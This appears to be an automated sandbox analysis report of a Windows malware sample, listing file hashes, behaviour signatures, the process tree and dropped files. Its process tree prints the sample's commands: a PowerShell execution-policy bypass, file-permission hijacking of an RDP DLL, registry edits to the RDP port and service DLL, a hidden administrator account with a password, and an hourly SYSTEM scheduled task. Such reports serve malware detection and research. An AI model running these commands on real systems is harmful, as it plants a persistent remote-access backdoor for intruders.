Analysis
-
max time kernel
135s -
max time network
94s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
-
submitted
25-11-2022 08:29
General
-
Target
48a73b3a40e13d6f6d611522c618043ef14d870be5fb4b87e9c789cba9ca2de0.exe
-
Size
2.3MB
-
MD5
8640faa50991a260de7cf73ea56b5461
-
SHA1
d2a2f5b1a4c3643290e8ce378f3c497c9b6f94d4
-
SHA256
48a73b3a40e13d6f6d611522c618043ef14d870be5fb4b87e9c789cba9ca2de0
-
SHA512
0ab932f92e210b9171f8fa7cd18ac2ab94a552865bc0fdd72cdc1ebc52e85392730722f3563fd6bb9fc1635e63519d764b89ce600caafa29a5abb506611334cf
-
SSDEEP
49152:sc+3+iySeZ3sIbHhrQpfHm0RJHqulcsRycArKFU:sca+iTeDQfHm0RJHq9hcArd
Malware Config
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
-
Sets DLL path for service in the registry 2 TTPs 1 IoCs
-
UPX packed file 1 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Deletes itself 1 IoCs
-
Loads dropped DLL 3 IoCs
-
Modifies file permissions 1 TTPs 8 IoCs
-
Drops file in System32 directory 1 IoCs
-
Drops file in Windows directory 3 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
-
Suspicious behavior: LoadsDriver 4 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\48a73b3a40e13d6f6d611522c618043ef14d870be5fb4b87e9c789cba9ca2de0.exe"C:\Users\Admin\AppData\Local\Temp\48a73b3a40e13d6f6d611522c618043ef14d870be5fb4b87e9c789cba9ca2de0.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wscript.exe"wscript.exe" C:\Users\Admin\AppData\Local\Temp\pomog.vbs2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c rename C:\Users\Admin\AppData\Local\Temp\pomog.txt pomog.ps1&timeout -t 3& powershell -ep bypass -f C:\Users\Admin\AppData\Local\Temp\pomog.ps13⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\timeout.exetimeout -t 34⤵
- Delays execution with timeout.exe
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -f C:\Users\Admin\AppData\Local\Temp\pomog.ps14⤵
- Deletes itself
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"5⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f5⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d %SystemRoot%\help\temp222.dat /f5⤵
- Sets DLL path for service in the registry
- Modifies registry key
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f5⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f5⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 44zI4UVZ /add1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 44zI4UVZ /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 44zI4UVZ /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" ZERMMMDR$ /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" ZERMMMDR$ /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" ZERMMMDR$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 44zI4UVZ1⤵
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 44zI4UVZ2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 44zI4UVZ3⤵
-
C:\Windows\System32\cmd.execmd /C schtasks /create /tn 48957 /tr "powershell -nop -ep bypass -f c:\windows\help\98991.ps1" /ru system /sc hourly /mo 11⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /tn 48957 /tr "powershell -nop -ep bypass -f c:\windows\help\98991.ps1" /ru system /sc hourly /mo 12⤵
- Creates scheduled task(s)
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\12444.txtFilesize
2.4MB
MD5ac1bafbc7e973e69602d70d8e0ec3829
SHA165ba4b45cbbccd85ec5c155cd7c41736e5a3382c
SHA256524a02b242b293b05925caa4def1626e9e0facf971d779999ecbc2d2898ed194
SHA5127b71bc5ee36d44db6b2e226b588d42ed3f67cd73a188f801809dda6fdd37275b57129a2a41dd8f844b26e61c82aa205ab1182e842b7cb728e4f46fb2a233f1d6
-
C:\Users\Admin\AppData\Local\Temp\65336777.txtFilesize
36KB
MD52c50ffba8c7d98a9cb5fec3c2a6913df
SHA1849b62f4911551b69cab9bc5ca6cf1af7ca28fc0
SHA256f510b64ebae6560c829f3b7081bf6073633ad5cb089bf2fb7b86ae0ad96267b0
SHA5127d28e6f5d30c918a0324d487828de7cdbf22c6262a67927f110155a02f00f902263037eb0d1eff1ca31be744a0026d3081a5f74d7d47fc1e86b13c9f243ce750
-
C:\Users\Admin\AppData\Local\Temp\722666222.logFilesize
62KB
MD50c34e2096fc530535d1fb38b8e9f68a6
SHA1ac9912a3bf5da42cfa9bdc5a48a41c5336980f4a
SHA256fee2dc3b455813797160264ecebcda7c34707fdafc96320f843891500971fedb
SHA5120b4b21aecaff1b0e3a3ea9611954a4a32d3ae73c456373b0d6375d661192e09c608175de61abafc2f8bf264a7817a753052e1767ba3cb0755350af9966d66bdf
-
C:\Users\Admin\AppData\Local\Temp\9887742.txtFilesize
198KB
MD5074ff8eac2103666760749711597b336
SHA11c349951336d7059807d89163e9c118ef1a6bf26
SHA2560e22f549a70422bade6e5a19b9efe06c816e90f02f161882a24dde795cb33172
SHA5127c1f7397367e11ee62cc62f62b059b671409097dd857873c31346d704b0ef7b2d82e318fb8ed1eee3ddb3804ab1f13268190240e2c0ad213c6764118ccdaa237
-
C:\Users\Admin\AppData\Local\Temp\changes_765543.txtFilesize
102B
MD5b72f79c10c59890f9049cb5a6332d680
SHA14d3f6fa8a15c2fcaee275983e072207fe1c5b277
SHA2566589829ca13d08781f77e050907225885692cf6bd64f930ca6c9f9d71740942a
SHA512f103bca53aac43bcde9a4f9d7da62615861014d6b7e2e4ea775f04a551bf10f5e075a1863d575242d6a927eecc805b47ac5aca67b44a04eb36acb18cf73947dd
-
C:\Users\Admin\AppData\Local\Temp\pomog.txtFilesize
39KB
MD5f140a509e9385574c51a0b6c53d89638
SHA1c0471a4aa09ccb2fae2214d9fddc758058e4f92f
SHA256a15fcc9cd5680ba9bb513b46765554d68e8a11fb71826c25bce8cbc6be448af2
SHA51272baa25c367db6c922c692e6bd9052cb426438570d13e78577f482549a54e51497c5b3ed58dedabf261945a1b8dcb68833b52fdc7dfef9341f0a36c308ce4e3c
-
C:\Users\Admin\AppData\Local\Temp\pomog.vbsFilesize
142B
MD511789c8be9e4201c26d57b0e192489de
SHA16917bcfbeb124c48dbc1d08956f84e84b5a53960
SHA256ce810ffdf9f3462bd9334993b43f3209a5662127519f336ef7d440201f0fa8db
SHA512dcd2296e9174089d9b4802868cc1f3997ec814b8ab7a60b0a59af9f95742c53dac0fcf07c250f08041e91dcdfaaef1f3493b686c4f6a205543e06f2c801d8804
-
C:\Windows\system32\rfxvmt.dllFilesize
40KB
MD5dc39d23e4c0e681fad7a3e1342a2843c
SHA158fd7d50c2dca464a128f5e0435d6f0515e62073
SHA2566d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA5125cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7
-
\??\PIPE\samrMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\Users\Admin\AppData\Local\Temp\nstBE.tmp\System.dllFilesize
11KB
MD5fbe295e5a1acfbd0a6271898f885fe6a
SHA1d6d205922e61635472efb13c2bb92c9ac6cb96da
SHA256a1390a78533c47e55cc364e97af431117126d04a7faed49390210ea3e89dd0e1
SHA5122cb596971e504eaf1ce8e3f09719ebfb3f6234cea5ca7b0d33ec7500832ff4b97ec2bbe15a1fbf7e6a5b02c59db824092b9562cd8991f4d027feab6fd3177b06
-
\Windows\Help\temp221.datFilesize
940KB
MD5666b20fd3f3d244f984a470e9d468f53
SHA11ed4fcf1994664b8cf511526f54996055f883f95
SHA2565d9227777bce252a4f1dfbd44e539e0b689cbffa831d8682f90c4df94bdb9873
SHA5129f0e625ae92a8d81f381e4b2e8dd489d30001481dfee361aca624f53b43177e95d8bf3cc982fd56671eaa59338ea9587464b7ec802885534b3b14300daf1b432
-
\Windows\Help\temp222.datFilesize
123KB
MD51e38a16381d1a98127bade41544334cf
SHA108766e656a810c1e31fe86bfe48eba4483e21bba
SHA256f832cf40fd4ba232b6005b2d487b40e97761351d6d1f10751fecdaa5a5a579a3
SHA5129a14f5bbfc76cfa71289edde85363bde7e14c95295da5fed7d8d24bce2379436083f4794955574e4bbe2ad9a0284c93cf4a09952bd0f24f1fce10462ad899635
-
memory/276-103-0x0000000000000000-mapping.dmp
-
memory/288-82-0x0000000000000000-mapping.dmp
-
memory/856-76-0x0000000000000000-mapping.dmp
-
memory/884-86-0x0000000000000000-mapping.dmp
-
memory/936-89-0x0000000000000000-mapping.dmp
-
memory/1040-94-0x0000000000000000-mapping.dmp
-
memory/1044-61-0x0000000000000000-mapping.dmp
-
memory/1072-72-0x0000000000000000-mapping.dmp
-
memory/1076-69-0x000000000288B000-0x00000000028AA000-memory.dmpFilesize
124KB
-
memory/1076-66-0x0000000002884000-0x0000000002887000-memory.dmpFilesize
12KB
-
memory/1076-65-0x000007FEF33E0000-0x000007FEF3F3D000-memory.dmpFilesize
11.4MB
-
memory/1076-64-0x000007FEF3F40000-0x000007FEF4963000-memory.dmpFilesize
10.1MB
-
memory/1076-62-0x0000000000000000-mapping.dmp
-
memory/1076-104-0x0000000002884000-0x0000000002887000-memory.dmpFilesize
12KB
-
memory/1076-105-0x000000000288B000-0x00000000028AA000-memory.dmpFilesize
124KB
-
memory/1076-83-0x0000000002884000-0x0000000002887000-memory.dmpFilesize
12KB
-
memory/1076-84-0x000000000288B000-0x00000000028AA000-memory.dmpFilesize
124KB
-
memory/1108-59-0x0000000000000000-mapping.dmp
-
memory/1200-92-0x0000000000000000-mapping.dmp
-
memory/1204-101-0x0000000000000000-mapping.dmp
-
memory/1284-97-0x0000000000000000-mapping.dmp
-
memory/1284-77-0x0000000000000000-mapping.dmp
-
memory/1368-74-0x0000000000000000-mapping.dmp
-
memory/1372-95-0x0000000000000000-mapping.dmp
-
memory/1380-75-0x0000000000000000-mapping.dmp
-
memory/1452-93-0x0000000000000000-mapping.dmp
-
memory/1560-58-0x000007FEFC2C1000-0x000007FEFC2C3000-memory.dmpFilesize
8KB
-
memory/1560-56-0x0000000000000000-mapping.dmp
-
memory/1580-99-0x0000000000000000-mapping.dmp
-
memory/1580-81-0x0000000000000000-mapping.dmp
-
memory/1620-79-0x0000000000000000-mapping.dmp
-
memory/1700-90-0x0000000000000000-mapping.dmp
-
memory/1712-78-0x0000000000000000-mapping.dmp
-
memory/1920-102-0x0000000000000000-mapping.dmp
-
memory/1952-85-0x0000000000000000-mapping.dmp
-
memory/1980-54-0x00000000756B1000-0x00000000756B3000-memory.dmpFilesize
8KB
-
memory/2016-98-0x0000000000000000-mapping.dmp
-
memory/2016-80-0x0000000000000000-mapping.dmp
-
memory/2036-96-0x0000000000000000-mapping.dmp